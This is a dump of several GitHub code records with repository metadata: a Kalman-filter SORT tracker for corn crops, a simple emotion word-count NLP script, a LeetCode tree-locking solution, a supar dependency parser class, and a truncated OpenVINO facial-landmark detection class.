It works with bounding boxes.\n\"\"\"\n\nfrom typing import List, Tuple\n\nimport numpy as np\nimport numpy.typing as npt\nfrom filterpy.kalman import KalmanFilter\nfrom scipy.optimize import linear_sum_assignment\n\nfrom ts_semantic_feature_detector.features_3d.camera import StereoCamera\nfrom ts_semantic_feature_detector.features_3d.crop import CornCrop\nfrom ts_semantic_feature_detector.features_3d.sequence import AgriculturalSequence\n\nclass KalmanBoxTracker():\n \"\"\"\n Implements a bounding box tracker with Kalman filter.\n\n Attributes:\n crops (:obj:`list`): a list of :obj:`features_3d.crop.CornCrop`\n that this tracker refers to.\n \"\"\"\n\n count = 0\n \"\"\"\n int: static attribute to give unique ID's to the trackers.\n \"\"\"\n\n def __init__(\n self,\n crop: CornCrop\n ):\n \"\"\"\n Initialize a box tracker.\n\n TODO: update documentation about the state and action vectors.\n\n Args:\n crop (:obj:`features_3d.crop.CornCrop`): the object containing\n information about a single corn crop.\n \"\"\"\n self.kf = KalmanFilter(dim_x=7, dim_z=6, dim_u=2)\n\n # State transition matrix.\n self.kf.F = np.array([\n [1, 0, 0, 0, 1, 0, 0],\n [0, 1, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 0, 0, 1],\n [0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1]\n ])\n\n # Control transition matrix.\n self.kf.B = np.array([\n [0, 0],\n [0, 0],\n [0, 0],\n [0, 0],\n [1, 0],\n [0, 1],\n [0, 0]\n ])\n\n # Measurement function.\n self.kf.H = np.array([\n [1, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0]\n ])\n\n # Process noise \n self.kf.Q[:, :] *= 1e6\n\n # Measurement noise\n # Trust a lot position and displacement of matched detections.\n self.kf.R *= 10e-6\n # self.kf.R[:2, :2] *= 10e-3\n # self.kf.R[4:-1, 4:-1] *= 10e-3\n # Do not trust scale and ratio changes too much (original implementation).\n # self.kf.R[2:4,2:4] *= 10.\n # self.kf.R[-1, -1] *= 10.\n\n # Covariance matrix\n self.kf.P[-1, -1] *= 1000. # High uncertainty to scale velocity.\n self.kf.P *= 10.\n \n self.kf.x[:4] = self._convert_bbox_to_z(crop.crop_box.data)\n self.time_since_update = 0\n self.id = KalmanBoxTracker.count\n KalmanBoxTracker.count += 1\n self.history = []\n self.hits = 0\n self.hit_streak = 0\n self.age = 0\n\n # Change crop cluster.\n self.crops = []\n self.crops.append(crop)\n self.crops[-1].cluster = self.id\n\n def _convert_bbox_to_z(\n self,\n bbox: npt.ArrayLike\n ) -> npt.ArrayLike:\n \"\"\"\n Converts a bounding box in format [x1, y1, x2, y2] into [x, y, s, r].\n\n The [x1, y1, x2, y2] is segmentation model output format for bounding\n boxes, where (x1, y1) describes the top-left point and (x2, y2) the\n bottom-right point. 
The [x, y, s, r] is the Kalman filter format, where\n (x, y) describes the bounding box center coordinates, s is the bounding\n box area and r is bounding box size ratio.\n\n Args:\n bbox: (:obj:`np.ndarray`): containing the crop bounding box.\n\n Returns:\n converted_data (:obj:`np.ndarray`): the bounding box data converted.\n \"\"\"\n w = bbox[2] - bbox[0]\n h = bbox[3] - bbox[1]\n x = bbox[0] + w/2.\n y = bbox[1] + h/2.\n s = w * h\n r = w / float(h)\n\n if len(bbox) > 4:\n return np.array([x, y, s, r, bbox[4], bbox[5]]).reshape((6, 1))\n else:\n return np.array([x, y, s, r]).reshape((4, 1))\n \n def _convert_x_to_bbox(\n self,\n x: List,\n score: float = None\n ) -> npt.ArrayLike:\n \"\"\"\n Converts a bounding box in format [x, y, s, r] into [x1, y1, x2, y2].\n\n The [x1, y1, x2, y2] is segmentation model output format for bounding\n boxes, where (x1, y1) describes the top-left point and (x2, y2) the\n bottom-right point. The [x, y, s, r] is the Kalman filter format, where\n (x, y) describes the bounding box center coordinates, s is the bounding\n box area and r is bounding box size ratio.\n\n Args:\n x (:obj:`list`): containing the bounding box data.\n score (float, optional): containing the detection score.\n\n Returns:\n converted_data (:obj:`np.ndarray`): the bounding box data converted.\n \"\"\"\n w = np.sqrt(x[2] * x[3])\n h = x[2] / w\n if(score==None):\n return np.array([x[0]-w/2.,x[1]-h/2.,x[0]+w/2.,x[1]+h/2.]).reshape((1,4))\n else:\n return np.array([x[0]-w/2.,x[1]-h/2.,x[0]+w/2.,x[1]+h/2.,score]).reshape((1,5))\n\n def predict(\n self,\n motion_2d_offset: npt.ArrayLike\n ) -> npt.ArrayLike:\n \"\"\"\n Executes the Kalman filter predict step.\n\n Args:\n motion_2d_offset: a :obj:`np.ndarray` containing the 2D motion offset\n calculated from the extrinsics information.\n\n Returns:\n prediction (:obj:`np.ndarray`): the predicted bounding box.\n \"\"\"\n\n # Checks if the new predicted scale will be zero.\n # If yes, ignores the scale improvement.\n if((self.kf.x[4] + self.kf.x[2]) <= 0):\n self.kf.x[4] *= 0.0\n\n # Advances the state vector informing the motion offset\n # as the control action.\n self.kf.predict(motion_2d_offset)\n self.age += 1\n\n # Updates the time information\n if self.time_since_update > 0:\n self.hit_streak = 0\n self.time_since_update += 1\n\n self.history.append(\n self._convert_x_to_bbox(self.kf.x)\n )\n\n return self.history[-1]\n \n def update(\n self,\n detection: npt.ArrayLike\n ) -> None:\n \"\"\"\n Executes the Kalman filter correction step.\n\n Args:\n detection (:obj:`np.ndarray`): the detected bounding box\n in format [x1, y1, x2, y2].\n \"\"\"\n\n self.time_since_update = 0\n self.history = []\n self.hits += 1\n self.hit_streak += 1\n self.kf.update(self._convert_bbox_to_z(detection))\n\n def get_state(\n self\n ) -> npt.ArrayLike:\n \"\"\"\n Get the current bounding box estimate.\n\n Returns:\n state (:obj:`np.ndarray`): the current bounding box estimate.\n \"\"\"\n return self._convert_x_to_bbox(self.kf.x)\n\nclass AgricultureSort():\n \"\"\"\n Modified SORT: A Simple, Online and Realtime Tracker.\n\n Attributes:\n camera (features_3d.camera.StereoCamera): the camera object that\n contains all the stereo camera information to project 3D points\n back into the 2D plane.\n max_age (int): the maximum number of frames to keep alive a track \n without associated detections.\n min_hits (int): the minimum number of associated detections before\n track is initialised.\n iou_threshold (float): the minimum IOU for match.\n trackers (:obj:`list`): a 
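The two conversions documented above are inverses of each other; a standalone round-trip check of the same math, independent of the tracker class:

import numpy as np

def bbox_to_z(b):
    # [x1, y1, x2, y2] -> [center_x, center_y, area, aspect_ratio]
    w, h = b[2] - b[0], b[3] - b[1]
    return np.array([b[0] + w / 2., b[1] + h / 2., w * h, w / float(h)])

def z_to_bbox(z):
    # [center_x, center_y, area, aspect_ratio] -> [x1, y1, x2, y2]
    w = np.sqrt(z[2] * z[3])
    h = z[2] / w
    return np.array([z[0] - w / 2., z[1] - h / 2., z[0] + w / 2., z[1] + h / 2.])

box = np.array([10., 20., 50., 100.])
assert np.allclose(z_to_bbox(bbox_to_z(box)), box)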
list of :obj:`KalmanBoxTracker` objects.\n frame_count (int): the current frame number.\n \"\"\"\n def __init__(\n self,\n camera: StereoCamera,\n max_age = 1,\n min_hits = 3,\n iou_threshold = 0.3\n ):\n \"\"\"\n Initialize the SORT object.\n\n Args:\n camera (features_3d.camera.StereoCamera): the camera object that\n contains all stereo camera information to project 3D points \n back into the 2D plane.\n max_age (int, optional): the maximum number of frames to keep alive \n a track without associated detections.\n min_hits (int, optional): the minimum number of associated detections\n before track is initialised.\n iou_threshold (float, optional): the minimum IOU for match.\n \"\"\"\n self.camera = camera\n self.max_age = max_age\n self.min_hits = min_hits\n self.iou_threshold = iou_threshold\n\n self.trackers = []\n self.frame_count = 0\n\n def step(\n self,\n sequence: AgriculturalSequence\n ) -> npt.ArrayLike:\n \"\"\"\n Executes the tracker step.\n\n Args:\n sequence (:obj:`features_3d.agriculture.AgriculturalSequence`): the sequence\n object that contains all the information about the scenes.\n\n Returns:\n tracked_bbox (:obj:`np.ndarray`): containing the tracked bounding boxes.\n \"\"\"\n\n self.frame_count += 1\n\n # Update crops with the 2D motion offset from extrinsics\n self.get_crops_motion(sequence)\n\n # Load information about the Kalman filter prediction step of existing trackers.\n # Also checks if the prediction is valid. If not, saves the tracker index to\n # remove it later. \n trackers_data = np.zeros((len(self.trackers), 5))\n to_delete_existing_trackers_idxs = []\n for t, tracker_data in enumerate(trackers_data):\n prediction = self.trackers[t].predict(\n self.trackers[t].crops[-1].estimated_motion_2d\n )[0]\n tracker_data[:] = [\n prediction[0], prediction[1], prediction[2], prediction[3], 0\n ]\n\n if np.any(np.isnan(prediction)):\n to_delete_existing_trackers_idxs.append(t)\n\n # Filter the extracted data from existing trackers.\n trackers_data = np.ma.compress_rows(np.ma.masked_invalid(trackers_data))\n\n # Remove the trackers whose predictions were not valid.\n for t in reversed(to_delete_existing_trackers_idxs):\n self.trackers.pop(t)\n\n detections = np.array([crop.crop_box.data for crop in sequence.scenes[-1].crop_group.crops])\n if not detections.any():\n detections = np.empty((0, 5))\n\n matched, unmatched_detections, unmatched_trackers = self._associate_detections_to_trackers(\n detections,\n trackers_data,\n self.iou_threshold\n )\n\n # For each found correspondence, runs the Kalman filter correction step.\n # Also adds the current crop to the tracker.\n for m in matched:\n last_box = self.trackers[m[1]].crops[-1].crop_box.data\n current_box = detections[m[0], :]\n diff_2d = np.array(current_box[:2] - last_box[:2])\n \n observation = np.concatenate([current_box, diff_2d])\n self.trackers[m[1]].update(observation)\n\n # Adds the crop to the tracker. 
\n self.trackers[m[1]].crops.append(sequence.scenes[-1].crop_group.crops[m[0]])\n self.trackers[m[1]].crops[-1].cluster = self.trackers[m[1]].id\n\n # Create and initialise new trackers for unmatched detections.\n for u in unmatched_detections:\n tracker = KalmanBoxTracker(\n sequence.scenes[-1].crop_group.crops[u]\n )\n self.trackers.append(tracker)\n\n # Filter the existing trackers by max_age and min_hits.\n ret = []\n t = len(self.trackers)\n for tracker in reversed(self.trackers):\n if tracker.time_since_update < 1:\n if (tracker.hit_streak >= self.min_hits) or (self.frame_count <= self.min_hits):\n d = tracker.get_state()[0]\n\n # # Modify the crop's clusters to match tracker ID.\n # for crop in tracker.crops:\n # crop.cluster = tracker.id\n\n ret.append(\n np.concatenate(\n (d, [tracker.id])\n ).reshape(1,-1)\n ) \n t -= 1\n\n if tracker.time_since_update > self.max_age:\n self.trackers.pop(t)\n\n if len(ret) > 0:\n return np.concatenate(ret)\n else:\n return np.empty((0, 5))\n \n def _iou_batch(\n self,\n bb_test: npt.ArrayLike,\n bb_gt: npt.ArrayLike\n ) -> npt.ArrayLike:\n \"\"\"\n Computes the IOU metric between two bounding boxes in the form [x1, y1, x2, y2].\n\n Args:\n bb_test (:obj:`np.ndarray`): the first bounding box.\n bb_gt (:obj:`np.ndarray`): the second bounding box.\n\n Returns:\n iou_values (:obj:`np.ndarray`): containing the IOU metric from each \n tracker/detection pair.\n \"\"\"\n bb_gt = np.expand_dims(bb_gt, 0)\n bb_test = np.expand_dims(bb_test, 1)\n \n xx1 = np.maximum(bb_test[..., 0], bb_gt[..., 0])\n yy1 = np.maximum(bb_test[..., 1], bb_gt[..., 1])\n xx2 = np.minimum(bb_test[..., 2], bb_gt[..., 2])\n yy2 = np.minimum(bb_test[..., 3], bb_gt[..., 3])\n w = np.maximum(0., xx2 - xx1)\n h = np.maximum(0., yy2 - yy1)\n wh = w * h\n o = wh / ((bb_test[..., 2] - bb_test[..., 0]) * (bb_test[..., 3] - bb_test[..., 1]) \n + (bb_gt[..., 2] - bb_gt[..., 0]) * (bb_gt[..., 3] - bb_gt[..., 1]) - wh) \n \n return(o)\n \n def _linear_assignment(\n self,\n cost_matrix: npt.ArrayLike\n ) -> npt.ArrayLike: \n \"\"\"\n Calculates the best detection/trackers correspondence.\n \n Args:\n cost_matrix (:obj:`np.ndarray`) containing negative IOU values\n for each detection and tracker pair.\n\n Returns:\n matches (:obj:`np.ndarray`): each line indicates a correspondance \n between the first column (detection) and the second one (tracker).\n \"\"\"\n x, y = linear_sum_assignment(cost_matrix)\n return np.array(list(zip(x, y)))\n\n def _associate_detections_to_trackers(\n self,\n detections: npt.ArrayLike,\n trackers_data: npt.ArrayLike,\n iou_threshold: float\n ) -> Tuple[npt.ArrayLike, npt.ArrayLike, npt.ArrayLike]:\n \"\"\"\n Associates the detections to the existing trackers.\n\n Args:\n detections (:obj:`np.ndarray`): the bounding boxes detected in\n the current frame.\n trackers_data (:obj:`np.ndarray`): the existing bounding boxes\n from the existing trackers.\n iou_threshold (float): the minimum IOU for match.\n\n Returns:\n matches (:obj:`np.ndarray`): the matches between detections and trackers.\n unmatched_detections (:obj:`np.ndarray`): the unmatched detections.\n unmatched trackers (:obj:`np.ndarray`): the unmatched trackers.\n \"\"\"\n\n # If there is not any tracker yet, just return all detections\n # as unmatched ones.\n if len(trackers_data) == 0:\n matched = np.empty((0, 2), dtype=int)\n unmatched_detections = np.arange(len(detections))\n unmatched_trackers = np.empty((0, 5), dtype=int)\n return matched, unmatched_detections, unmatched_trackers\n \n # If there are 
already some trackers, check their IOU metric\n # with the provided detections\n iou_matrix = self._iou_batch(detections, trackers_data)\n\n matched_idxs = None\n # Checks if there are detections and trackers overlapping\n if min(iou_matrix.shape) > 0:\n a = (iou_matrix > iou_threshold).astype(np.int32)\n\n # Checks if there is only one good detection and tracker correspondence.\n if a.sum(1).max() == 1 and a.sum(0).max() == 1:\n matched_idxs = np.stack(np.where(a), axis=1)\n else:\n # If not, try to find the best correspondence with the Jonker-Volgenant algorithm.\n matched_idxs = self._linear_assignment(-iou_matrix)\n else:\n # If not, just return an empty NumPy array.\n matched_idxs = np.empty((0, 2))\n\n # Finds the detections that don't have a tracker correspondence.\n unmatched_detections = []\n for d, detection in enumerate(detections):\n if d not in matched_idxs[:, 0]:\n unmatched_detections.append(d)\n\n # Finds the trackers that don't have a detection correspondence.\n unmatched_trackers = []\n for t, tracker in enumerate(trackers_data):\n if t not in matched_idxs[:, 1]:\n unmatched_trackers.append(t)\n\n matches = []\n for m in matched_idxs:\n #Filters the matches that have low IOU (when linear_assignment was used)\n if iou_matrix[m[0], m[1]] < iou_threshold:\n unmatched_detections.append(m[0])\n unmatched_trackers.append(m[1])\n else:\n matches.append(m.reshape(1, 2))\n\n if len(matches) == 0:\n matches = np.empty((0, 2), dtype=int)\n else:\n matches = np.concatenate(matches, axis=0)\n\n return matches, np.array(unmatched_detections), np.array(unmatched_trackers)\n\n def get_crops_motion(\n self,\n sequence: AgriculturalSequence\n ) -> None:\n \"\"\"\n Calculates a prediction of the crop's position using extrinsics information.\n\n Args:\n sequence (:obj:`features_3d.sequence.AgriculturalSequence`): object that\n contains all the crop information during several scenes.\n \"\"\"\n if len(sequence.scenes) > 1:\n current_scene = sequence.scenes[-1]\n prev_scene = sequence.scenes[-2]\n\n # Get the transformation between the two consecutive scenes and converts it back to origin frame.\n shift_transform = np.linalg.inv(current_scene.extrinsics) @ current_scene.extrinsics @ np.linalg.inv(prev_scene.extrinsics)\n\n # print('self.camera.size = ', self.camera.size)\n\n # For each crop in the previous scene, apply the transformation in the average point.\n # Calculates the difference between the previous average point with the transformed one.\n # Project this difference back into the 2D image plane.\n for prev_crop in prev_scene.crop_group.crops:\n # Apply the shift to the average point\n shifted_avg_point = shift_transform @ np.append(prev_crop.average_point, 1)\n shifted_2d_point = self.camera.get_2d_point(shifted_avg_point)\n\n # print('prev_crop.average_point = ', prev_crop.average_point)\n # print('shifted_avg_point = ', shifted_avg_point)\n # print('shifted_2d_point = ', shifted_2d_point)\n \n prev_box = prev_crop.crop_box.data\n box_center_x = np.average([prev_box[0], prev_box[2]])\n box_center_y = np.average([prev_box[1], prev_box[3]])\n box_center = np.array([box_center_x, box_center_y])\n\n # print('box_center = ', box_center)\n\n diff_2d = shifted_2d_point - box_center\n prev_crop.estimated_motion_2d = diff_2d\n # print('diff_2d = ', diff_2d)\n\n # Correcting direction of the movement.\n # prev_box = prev_crop.crop_box.data\n # if box_center[0] > self.camera.size[0]/2:\n # prev_crop.estimated_motion_2d[0] *= -1.\n\n # Forces the array to be 2D to avoid problems when doing 
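_linear_assignment above negates the IOU matrix because scipy's linear_sum_assignment minimizes total cost, while the tracker wants to maximize total overlap. A minimal standalone illustration:

import numpy as np
from scipy.optimize import linear_sum_assignment

iou = np.array([[0.8, 0.1],
                [0.2, 0.6]])
rows, cols = linear_sum_assignment(-iou)  # maximizing IOU = minimizing -IOU
assert list(zip(rows, cols)) == [(0, 0), (1, 1)]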
matrix multiplication.\n prev_crop.estimated_motion_2d = prev_crop.estimated_motion_2d[:, None]\n","repo_name":"toschilt/ts_semantic_feature_detector","sub_path":"src/ts_semantic_feature_detector/features_2d/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":20113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19831251867","text":"\r\n# cleaning the text :\r\n# making sure everything is in lower case\r\n# remove all the punctuations\r\n#maketrans - makes a translation table, 3 args - 'chars to replace' 'chars to replace with' 'chars to delete'\r\n\r\n\r\nimport string\r\nfrom collections import Counter\r\nimport matplotlib.pyplot as plt\r\n\r\n#cleaning the words\r\n\r\ntext = open('read.txt',encoding='utf-8').read()\r\nlower_case=text.lower()\r\nprint(lower_case)\r\ncleaned_text = lower_case.translate(str.maketrans('','',string.punctuation))\r\nprint(cleaned_text)\r\n\r\n# tokenization breaks the string into small chunks called tokens that help with understanding the context\r\n#stop words are words that basically don't add any meaning to the sentence\r\n#NLTK has ready-made stop words\r\n\r\ntokenized_words=cleaned_text.split()\r\nprint(tokenized_words)\r\n\r\nstop_words = [\"i\", \"me\", \"my\", \"myself\", \"we\", \"our\", \"ours\", \"ourselves\", \"you\", \"your\", \"yours\", \"yourself\",\r\n \"yourselves\", \"he\", \"him\", \"his\", \"himself\", \"she\", \"her\", \"hers\", \"herself\", \"it\", \"its\", \"itself\",\r\n \"they\", \"them\", \"their\", \"theirs\", \"themselves\", \"what\", \"which\", \"who\", \"whom\", \"this\", \"that\", \"these\",\r\n \"those\", \"am\", \"is\", \"are\", \"was\", \"were\", \"be\", \"been\", \"being\", \"have\", \"has\", \"had\", \"having\", \"do\",\r\n \"does\", \"did\", \"doing\", \"a\", \"an\", \"the\", \"and\", \"but\", \"if\", \"or\", \"because\", \"as\", \"until\", \"while\",\r\n \"of\", \"at\", \"by\", \"for\", \"with\", \"about\", \"against\", \"between\", \"into\", \"through\", \"during\", \"before\",\r\n \"after\", \"above\", \"below\", \"to\", \"from\", \"up\", \"down\", \"in\", \"out\", \"on\", \"off\", \"over\", \"under\", \"again\",\r\n \"further\", \"then\", \"once\", \"here\", \"there\", \"when\", \"where\", \"why\", \"how\", \"all\", \"any\", \"both\", \"each\",\r\n \"few\", \"more\", \"most\", \"other\", \"some\", \"such\", \"no\", \"nor\", \"not\", \"only\", \"own\", \"same\", \"so\", \"than\",\r\n \"too\", \"very\", \"s\", \"t\", \"can\", \"will\", \"just\", \"don\", \"should\", \"now\"]\r\n\r\nfinal_words=[]\r\nfor word in tokenized_words:\r\n if word not in stop_words:\r\n final_words.append(word)\r\n\r\nprint(final_words)\r\n\r\n#NLP algo\r\n#check if the final word is present in the emotions text file\r\n#if present add the emotion to emotion_list\r\n#count each emotion in the emotion_list\r\n\r\nemotion_list=[]\r\n\r\nwith open('emotions.txt', 'r') as file:\r\n for line in file:\r\n clear_line = line.replace(\"\\n\", '').replace(\",\", '').replace(\"'\", '').strip()\r\n word, emotion = clear_line.split(':')\r\n\r\n if word in final_words:\r\n emotion_list.append(emotion)\r\n\r\nprint(emotion_list)\r\nw = Counter(emotion_list)\r\nprint(w)\r\n\r\nfig, ax1 = plt.subplots()\r\nax1.bar(w.keys(),w.values())\r\nfig.autofmt_xdate() #to automatically format the x-axis to accommodate all the emotions\r\nplt.savefig('graph.png')\r\nplt.show()\r\n\r\n#use zuck, steve job's speeches to 
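The tallying step in the script above is plain collections.Counter over the matched emotions; a tiny standalone sketch (the sample list is illustrative):

from collections import Counter

emotions = ["happy", "sad", "happy", "attached"]
counts = Counter(emotions)
assert counts.most_common(1) == [("happy", 2)]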
class\r\n","repo_name":"bazyagami/NLTK-usages","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1640635342","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass LockingTree:\n\n def __init__(self, parent: List[int]):\n self.locked = dict()\n self.parent = parent\n self.adj_list = defaultdict(list)\n for ind, node in enumerate(self.parent):\n self.adj_list[node].append(ind)\n\n def is_locked(self, node):\n return node in self.locked\n\n def lock(self, num: int, user: int) -> bool:\n if num in self.locked:\n return False\n self.locked[num] = user\n return True\n\n def unlock(self, num: int, user: int) -> bool:\n if num not in self.locked or self.locked[num] != user:\n return False\n self.locked.pop(num)\n return True\n\n def check_if_child_booked(self, node):\n stack = [node]\n\n while stack:\n node = stack.pop()\n for child in self.adj_list[node]:\n if self.is_locked(child):\n return True\n stack.append(child)\n\n return False\n\n def has_locked_ancestor(self, node):\n stack = [node]\n\n while stack:\n node = stack.pop()\n parent = self.parent[node]\n if self.is_locked(parent):\n return True\n if parent > 0:\n stack.append(parent)\n return False\n\n def unlock_descendents(self, node):\n stack = [node]\n\n while stack:\n node = stack.pop()\n for child in self.adj_list[node]:\n if self.is_locked(child):\n self.locked.pop(child)\n stack.append(child)\n\n def upgrade(self, num: int, user: int) -> bool:\n if self.is_locked(num) or not self.check_if_child_booked(num) or self.has_locked_ancestor(num):\n return False\n\n self.lock(num, user)\n self.unlock_descendents(num)\n return True\n\n\nif __name__ == '__main__':\n lockingTree = LockingTree([-1, 0, 0, 1, 1, 2, 2])\n lockingTree.lock(2, 2)\n lockingTree.unlock(2, 3)\n lockingTree.unlock(2, 2)\n lockingTree.lock(4, 5)\n lockingTree.upgrade(0, 1)\n lockingTree.lock(0, 1)","repo_name":"amogchandrashekar/Leetcode","sub_path":"Medium/Operations on Tree.py","file_name":"Operations on Tree.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71037470275","text":"# -*- coding: utf-8 -*-\n\nfrom typing import Iterable, Union\n\nimport torch\nfrom supar.config import Config\nfrom supar.models.dep.biaffine.parser import BiaffineDependencyParser\nfrom supar.models.dep.vi.model import VIDependencyModel\nfrom supar.utils.fn import ispunct\nfrom supar.utils.logging import get_logger\nfrom supar.utils.metric import AttachmentMetric\nfrom supar.utils.transform import Batch\n\nlogger = get_logger(__name__)\n\n\nclass VIDependencyParser(BiaffineDependencyParser):\n r\"\"\"\n The implementation of Dependency Parser using Variational Inference :cite:`wang-tu-2020-second`.\n \"\"\"\n\n NAME = 'vi-dependency'\n MODEL = VIDependencyModel\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def train(\n self,\n train: Union[str, Iterable],\n dev: Union[str, Iterable],\n test: Union[str, Iterable],\n epochs: int = 1000,\n patience: int = 100,\n batch_size: int = 5000,\n update_steps: int = 1,\n buckets: int = 32,\n workers: int = 0,\n amp: bool = False,\n cache: bool = False,\n punct: bool = False,\n tree: bool = False,\n proj: bool = False,\n partial: bool = False,\n verbose: bool = True,\n **kwargs\n ):\n return super().train(**Config().update(locals()))\n\n def 
evaluate(\n self,\n data: Union[str, Iterable],\n batch_size: int = 5000,\n buckets: int = 8,\n workers: int = 0,\n amp: bool = False,\n cache: bool = False,\n punct: bool = False,\n tree: bool = True,\n proj: bool = True,\n partial: bool = False,\n verbose: bool = True,\n **kwargs\n ):\n return super().evaluate(**Config().update(locals()))\n\n def predict(\n self,\n data: Union[str, Iterable],\n pred: str = None,\n lang: str = None,\n prob: bool = False,\n batch_size: int = 5000,\n buckets: int = 8,\n workers: int = 0,\n amp: bool = False,\n cache: bool = False,\n tree: bool = True,\n proj: bool = True,\n verbose: bool = True,\n **kwargs\n ):\n return super().predict(**Config().update(locals()))\n\n def train_step(self, batch: Batch) -> torch.Tensor:\n words, _, *feats, arcs, rels = batch\n mask = batch.mask\n # ignore the first token of each sentence\n mask[:, 0] = 0\n s_arc, s_sib, s_rel = self.model(words, feats)\n loss, *_ = self.model.loss(s_arc, s_sib, s_rel, arcs, rels, mask)\n return loss\n\n @torch.no_grad()\n def eval_step(self, batch: Batch) -> AttachmentMetric:\n words, _, *feats, arcs, rels = batch\n mask = batch.mask\n # ignore the first token of each sentence\n mask[:, 0] = 0\n s_arc, s_sib, s_rel = self.model(words, feats)\n loss, s_arc = self.model.loss(s_arc, s_sib, s_rel, arcs, rels, mask)\n arc_preds, rel_preds = self.model.decode(s_arc, s_rel, mask, self.args.tree, self.args.proj)\n if self.args.partial:\n mask &= arcs.ge(0)\n # ignore all punctuation if not specified\n if not self.args.punct:\n mask.masked_scatter_(mask, ~mask.new_tensor([ispunct(w) for s in batch.sentences for w in s.words]))\n return AttachmentMetric(loss, (arc_preds, rel_preds), (arcs, rels), mask)\n\n @torch.no_grad()\n def pred_step(self, batch: Batch) -> Batch:\n words, _, *feats = batch\n mask, lens = batch.mask, (batch.lens - 1).tolist()\n # ignore the first token of each sentence\n mask[:, 0] = 0\n s_arc, s_sib, s_rel = self.model(words, feats)\n s_arc = self.model.inference((s_arc, s_sib), mask)\n arc_preds, rel_preds = self.model.decode(s_arc, s_rel, mask, self.args.tree, self.args.proj)\n batch.arcs = [i.tolist() for i in arc_preds[mask].split(lens)]\n batch.rels = [self.REL.vocab[i.tolist()] for i in rel_preds[mask].split(lens)]\n if self.args.prob:\n batch.probs = [prob[1:i+1, :i+1].cpu() for i, prob in zip(lens, s_arc.unbind())]\n return batch\n","repo_name":"yzhangcs/parser","sub_path":"supar/models/dep/vi/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":785,"dataset":"github-code","pt":"61"} +{"seq_id":"75113603074","text":"import cv2\r\nfrom openvino.inference_engine import IENetwork, IECore\r\nimport numpy as np\r\nimport os\r\n\r\n# This class is used for Facial Landmarks Detection Model\r\n\r\nclass Model_LandmarkDetection:\r\n\r\n #Intializing the instance\r\n def __init__(self, model_name, device='CPU', extensions=None):\r\n self.model_name, self.device = model_name, device\r\n self.core, self.extensions = IECore(), extensions\r\n self.model_structure = self.model_name\r\n self.network = self.core.read_network(model=str(model_name),\r\n weights=str(os.path.splitext(model_name)[0] + \".bin\"))\r\n self.model_weights = self.model_name.split(\".\")[0]+'.bin'\r\n \r\n\r\n def load_model(self):\r\n '''\r\n load_model mothod is for loading the model to the device.\r\n '''\r\n # Initializes the network\r\n # Supported Layers\r\n s_layers = self.core.query_network(network=self.network, 
device_name=self.device)\r\n \r\n uns_layers = []\r\n for x in self.network.layers.keys():\r\n if x not in s_layers:\r\n uns_layers.append(x)\r\n\r\n l = len(uns_layers)\r\n if l !=0 and self.device=='CPU':\r\n print(\"Layers \"+str(uns_layers)+\" not supported\")\r\n\r\n if not self.extensions==None:\r\n print(\"Add cpu extension layer\")\r\n # Adding extension\r\n self.core.add_extension(self.extensions, self.device)\r\n # Supported and Unsupported layers\r\n s_layers = self.core.query_network(network = self.network, device_name=self.device)\r\n uns_layers = []\r\n for x in self.network.layers.keys():\r\n if x not in s_layers:\r\n uns_layers.append(x)\r\n if not len(uns_layers)==0:\r\n print(\"Layer not supported\")\r\n exit(1)\r\n else:\r\n print(\"Specify path of cpu extension\")\r\n exit(1)\r\n \r\n # Initializing network\r\n load = self.core.load_network(network=self.network, device_name=self.device,num_requests=1)\r\n self.exec_net = load\r\n '''\r\n Output name and Output shape\r\n '''\r\n o_name = next(iter(self.network.outputs))\r\n self.op_name = o_name\r\n o_shape = self.network.outputs[self.op_name].shape\r\n self.op_shape = o_shape\r\n '''\r\n Input name and Input shape \r\n '''\r\n i_name = next(iter(self.network.input_info))\r\n self.ip_name = i_name\r\n i_shape = self.network.input_info[self.ip_name].input_data.shape\r\n self.ip_shape = i_shape\r\n \r\n\r\n def check_model(self):\r\n s_layers = IECore().query_network(network=self.network, device_name=self.device)\r\n uns_layers = [layer for layer in self.network.layers.keys() if layer not in s_layers]\r\n if len(uns_layers) > 0:\r\n print(\"Please check extension for these unsupported layers =>\" + str(uns_layers))\r\n exit(1)\r\n print(\"FacialLandmarksDetectionModel layer check\")\r\n\r\n def predict(self, image):\r\n '''\r\n The predict method is used to run prediction on images\r\n '''\r\n img = image.copy()\r\n p_img = self.preprocess_input(img)\r\n d_inf = {self.ip_name:p_img}\r\n out = self.exec_net.infer(d_inf) \r\n height, width=image.shape[0], image.shape[1]\r\n coords = ((self.preprocess_output(out))* np.array([width, height, width, height])).astype(np.int32)\r\n # Getting left eye co-ordinates\r\n left_x_min, left_y_min = coords[0]-10, coords[1]-10\r\n left_x_max, left_y_max = coords[0]+10, coords[1]+10\r\n # Getting right eye co-ordinates\r\n right_x_min, right_y_min=coords[2]-10, coords[3]-10\r\n right_x_max, right_y_max=coords[2]+10, coords[3]+10\r\n # Getting left and right eye co-ordinates\r\n l_co_ords, r_co_ords = image[left_y_min:left_y_max, left_x_min:left_x_max], image[right_y_min:right_y_max, right_x_min:right_x_max]\r\n # def get_coords(self,image)\r\n # Getting total co-ordinates\r\n a, b = [left_x_min,left_y_min,left_x_max,left_y_max], [right_x_min,right_y_min,right_x_max,right_y_max]\r\n co_ords= [a,b]\r\n total = co_ords\r\n return l_co_ords, r_co_ords, total\r\n\r\n\r\n def preprocess_input(self, image):\r\n '''\r\n Preprocesses the data before it is fed into inference\r\n '''\r\n conv = 